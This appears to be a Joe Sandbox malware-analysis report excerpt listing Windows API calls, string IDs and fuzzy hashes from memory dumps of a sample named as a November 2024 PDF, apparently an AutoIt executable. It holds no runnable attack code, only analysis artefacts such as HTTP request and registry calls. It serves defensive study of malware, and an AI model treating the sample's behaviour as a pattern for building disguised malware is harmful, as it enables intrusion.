                                                                                                                      • Opcode ID: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                                                                                                                      • Instruction ID: 0ede34388908686080131d3596c08141ac48ff0a084fae39e02ec4b085f35ca2
                                                                                                                      • Opcode Fuzzy Hash: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                                                                                                                      • Instruction Fuzzy Hash: 44F03A3A142612EBDB112B64EC8CAEE773ABF45302B014532F243A10A0CB796911CB64
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007A8E7F
                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 007A8E8B
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007A8E94
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007A8E9C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 007A8EA5
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 007A8EAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146765662-0
                                                                                                                      • Opcode ID: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                                                                                                                      • Instruction ID: c9e9d49794aab6145ce7aa3a184005001cf46356b467754013e4e72bc4e0eef9
                                                                                                                      • Opcode Fuzzy Hash: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                                                                                                                      • Instruction Fuzzy Hash: 9EE0C236105005FBDA012FE5EC0C94ABF79FB89322B50C232F21A81170CB3A9820DB58
                                                                                                                      APIs
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C32
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C4A
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,007DFB80,000000FF,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C6F
                                                                                                                      • _memcmp.LIBCMT ref: 007A7C90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                      • String ID: ,,~
                                                                                                                      • API String ID: 314563124-1083855107
                                                                                                                      • Opcode ID: 25d6196784aca546f019fc53695bc8e6c3541248cdb2e108abab0272147c3045
                                                                                                                      • Instruction ID: a315bf806007a10576dfba5dda8fbba4482d199b8c58deff541c93a5ffe3bbd6
                                                                                                                      • Opcode Fuzzy Hash: 25d6196784aca546f019fc53695bc8e6c3541248cdb2e108abab0272147c3045
                                                                                                                      • Instruction Fuzzy Hash: E8810CB1A00109EFCB04DF94C984EEEB7B9FF89315F204599F516AB250DB75AE06CB60
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007C8928
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 007C8A37
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007C8BAF
                                                                                                                        • Part of subcall function 007B7804: VariantInit.OLEAUT32(00000000), ref: 007B7844
                                                                                                                        • Part of subcall function 007B7804: VariantCopy.OLEAUT32(00000000,?), ref: 007B784D
                                                                                                                        • Part of subcall function 007B7804: VariantClear.OLEAUT32(00000000), ref: 007B7859
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                      • Opcode ID: ab118a212944bbc64c291e4f30065dc655ea4f78feaa95b85877261d1e8b4667
                                                                                                                      • Instruction ID: a1e17487c92abffa88426132d780584de431be90ee7b65aa07073772561d2b94
                                                                                                                      • Opcode Fuzzy Hash: ab118a212944bbc64c291e4f30065dc655ea4f78feaa95b85877261d1e8b4667
                                                                                                                      • Instruction Fuzzy Hash: E6916CB5608301DFC754DF24C484E5ABBE4EF89314F04896EF99A8B361DB38E909CB52
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                                                                                                                      • _memset.LIBCMT ref: 007B3077
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B30A6
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B3159
                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007B3187
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 4152858687-4108050209
                                                                                                                      • Opcode ID: c2b85f31eb3a73a301b39a94fc326b151360276ae0e79e114914272518fc59ee
                                                                                                                      • Instruction ID: aa5b71d039dbe1abc597c72c3a7678a217711a1ca0b522f03c721e97cdb2f8dd
                                                                                                                      • Opcode Fuzzy Hash: c2b85f31eb3a73a301b39a94fc326b151360276ae0e79e114914272518fc59ee
• Instruction Fuzzy Hash: 6C51F2316097089AD714AF28C849BEBB7E9EF44360F044A2DF895D3191EB78CE85C752
APIs
• _memset.LIBCMT ref: 007B2CAF
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007B2CCB
• DeleteMenu.USER32(?,00000007,00000000), ref: 007B2D11
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00816890,00000000), ref: 007B2D5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
• Instruction ID: ae975927ba7c6b4e14ad145effb99b42a37db193ad71563d934d4b96384043d3
• Opcode Fuzzy Hash: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
• Instruction Fuzzy Hash: C341B4302063019FD714DF24D849B9BBBE4FF85320F14465EF96697292DB78E906CBA2
APIs
• CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CDAD9
  • Part of subcall function 007579AB: _memmove.LIBCMT ref: 007579F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: BuffCharLower_memmove
• String ID: cdecl$none$stdcall$winapi
• API String ID: 3425801089-567219261
• Opcode ID: 0bb4c100ba30a4dc35544add5c327f24b6adabb40dbeca9c50eac49620a653a4
• Instruction ID: a3cb418f35b7d611030d3e0ff669b5f33ad206164080fdd79f97aaac6832cac7
• Opcode Fuzzy Hash: 0bb4c100ba30a4dc35544add5c327f24b6adabb40dbeca9c50eac49620a653a4
• Instruction Fuzzy Hash: EE317270600619EBCF20EFA4CC959EEB7B4FF05310B10862DE866A76D1DB75AD09CB90
APIs
  • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
  • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007A93F6
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007A9409
• SendMessageW.USER32(?,00000189,?,00000000), ref: 007A9439
  • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: ComboBox$ListBox
• API String ID: 365058703-1403004172
• Opcode ID: 0fe36818224dbedad1badcc70a5a582c21a1f5271a2602a24330ea7e22385c8b
• Instruction ID: 0b59d862ae501419f034b75bd22afaa5be4b32d1f958f975592c5c5e26b9ce13
• Opcode Fuzzy Hash: 0fe36818224dbedad1badcc70a5a582c21a1f5271a2602a24330ea7e22385c8b
• Instruction Fuzzy Hash: 1521E4B1A00104FEDB18AB74DC8ACFFB778DF46350B108219FA26972E1DB7D490A9620
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C1B40
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C1B66
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007C1B96
• InternetCloseHandle.WININET(00000000), ref: 007C1BDD
  • Part of subcall function 007C2777: GetLastError.KERNEL32(?,?,007C1B0B,00000000,00000000,00000001), ref: 007C278C
  • Part of subcall function 007C2777: SetEvent.KERNEL32(?,?,007C1B0B,00000000,00000000,00000001), ref: 007C27A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: c435dcf97b12d6c50db58b02d6c7d390d421ec98ff0d02accadaf8609d14b08d
• Instruction ID: 1ab2b7f098c228eb887ddeecf90fa53ee8abccf35f074c0eccbce6dd159749be
• Opcode Fuzzy Hash: c435dcf97b12d6c50db58b02d6c7d390d421ec98ff0d02accadaf8609d14b08d
• Instruction Fuzzy Hash: 72218EB1500208BFEB119F609CC9FBB77FCEB4A754F50812EF506A6241EB289D059B61
APIs
  • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
  • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
  • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007D66D0
• LoadLibraryW.KERNEL32(?), ref: 007D66D7
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007D66EC
• DestroyWindow.USER32(?), ref: 007D66F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
• Opcode ID: 9a3fb58cd74794dc0bea08ee61c6e2150bc40358f0098e9ac2583fac8f7ba6c0
• Instruction ID: 17c8fbc9eb94374af053188353fe3354666381fa34e3e11e69085efd6e384c1d
• Opcode Fuzzy Hash: 9a3fb58cd74794dc0bea08ee61c6e2150bc40358f0098e9ac2583fac8f7ba6c0
• Instruction Fuzzy Hash: 31219D7120020AEFEF105F64EC80EBB37BDEF59368F10862AF951922A0D779CC519760
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 007B705E
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B7091
• GetStdHandle.KERNEL32(0000000C), ref: 007B70A3
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007B70DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 9a28d53cbdf8847e079c8dde2eb10fce30331c61afde1a27779be8a404536b80
• Instruction ID: 94d7f66e2936853ef01d3a93c04ff98e062c87c9db54005e9525992c06764176
• Opcode Fuzzy Hash: 9a28d53cbdf8847e079c8dde2eb10fce30331c61afde1a27779be8a404536b80
• Instruction Fuzzy Hash: EA215174604209AFDB24AF38DC09BEA77B8BF94720F20861AFDA1D72D0D7789950CB50
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 007B712B
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B715D
• GetStdHandle.KERNEL32(000000F6), ref: 007B716E
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007B71A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 34bc275bf3644db9498c83c9c99e1f9c9bb8b2a2db8dc1f19f022c5e1d1b94f4
• Instruction ID: f8caef5ff0244f46bea2c13eabfbab7b3a09a1e2bc823d69ad0872d8010d1ffa
• Opcode Fuzzy Hash: 34bc275bf3644db9498c83c9c99e1f9c9bb8b2a2db8dc1f19f022c5e1d1b94f4
• Instruction Fuzzy Hash: 8221907560420DABDB249F6C9C04BEAB7B8BFD5720F204619F9A1D32D0D778A841CB64
APIs
• SetErrorMode.KERNEL32(00000001), ref: 007BAEBF
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007BAF13
• __swprintf.LIBCMT ref: 007BAF2C
• SetErrorMode.KERNEL32(00000000,00000001,00000000,007DF910), ref: 007BAF6A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: b5a30ebd16c610a22291dae0b7c842d0a486a91597ff67678df004503bb07aa2
• Instruction ID: 418c0574649626deeb44b986c82a03017251bbb8861e6ab7f2e3bb75857be98b
• Opcode Fuzzy Hash: b5a30ebd16c610a22291dae0b7c842d0a486a91597ff67678df004503bb07aa2
• Instruction Fuzzy Hash: B6216270A00109EFCB10EF64C989EEE7BB8EF89704B008069F909DB251DB75EA45CB61
APIs
  • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
  • Part of subcall function 007AA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AA399
  • Part of subcall function 007AA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA3AC
  • Part of subcall function 007AA37C: GetCurrentThreadId.KERNEL32 ref: 007AA3B3
  • Part of subcall function 007AA37C: AttachThreadInput.USER32(00000000), ref: 007AA3BA
• GetFocus.USER32 ref: 007AA554
  • Part of subcall function 007AA3C5: GetParent.USER32(?), ref: 007AA3D3
• GetClassNameW.USER32(?,?,00000100), ref: 007AA59D
• EnumChildWindows.USER32(?,007AA615), ref: 007AA5C5
• __swprintf.LIBCMT ref: 007AA5DF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
• String ID: %s%d
• API String ID: 1941087503-1110647743
• Opcode ID: d678a122264c6eab733bcb878069dcb1fcab10b62820034282eac1820081146f
• Instruction ID: 4e2f3e676be4570a162f2f395289ef2641b8990b6a5f9e6486c9b93f41dcc474
• Opcode Fuzzy Hash: d678a122264c6eab733bcb878069dcb1fcab10b62820034282eac1820081146f
• Instruction Fuzzy Hash: 2911B471600208BBDF11BF60DC89FEA3778AF8A701F048175FD09AA152CB795945CB75
APIs
• CharUpperBuffW.USER32(?,?), ref: 007B2048
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
• Opcode ID: ec60460ba97184aa47f86de45eb588ad6371133ebd9628150875a7dda1d277bf
• Instruction ID: 0343116228eaa503ab50bdffc7941188c15223da21dbb1e6b46bdbaf3444647c
• Opcode Fuzzy Hash: ec60460ba97184aa47f86de45eb588ad6371133ebd9628150875a7dda1d277bf
• Instruction Fuzzy Hash: E3116D30911209DFCF14EFB8D8515EEB7B4FF19304B208869D856A7292EB36690BCB90
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007CEF1B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 007CEF4B
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007CF07E
• CloseHandle.KERNEL32(?), ref: 007CF0FF
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: aa84a6736496e7738b5c197295f7704b26866f73f107a403a9a6451b156225c9
• Instruction ID: e3c6ee75f5d375c4a7dcee08c08e510ab171554272754bec093e922c93ce8ef7
• Opcode Fuzzy Hash: aa84a6736496e7738b5c197295f7704b26866f73f107a403a9a6451b156225c9
• Instruction Fuzzy Hash: 28817371604700DFD720DF28C84AF6AB7E5AF88B10F14881DF996DB292DBB9AD44CB51
APIs
  • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
  • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0388
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D03C7
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007D040E
• RegCloseKey.ADVAPI32(?,?), ref: 007D043A
• RegCloseKey.ADVAPI32(00000000), ref: 007D0447
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: 6242102c56ea99c255dfc4b37479b2d8ef4cfea8fe7770fbd8ce46c3dfccf9ef
• Instruction ID: ed15c5fbd81e45421d89b345d6a0e6d8676fc87a2df8768776aea744f3be627b
• Opcode Fuzzy Hash: 6242102c56ea99c255dfc4b37479b2d8ef4cfea8fe7770fbd8ce46c3dfccf9ef
• Instruction Fuzzy Hash: 59513B71208244EFD704EB64D885FAAB7F8FF84314F44892EF59687291DB78E909CB52
APIs
  • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
  • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDC3B
• GetProcAddress.KERNEL32(00000000,?), ref: 007CDCBE
• GetProcAddress.KERNEL32(00000000,00000000), ref: 007CDCDA
• GetProcAddress.KERNEL32(00000000,?), ref: 007CDD1B
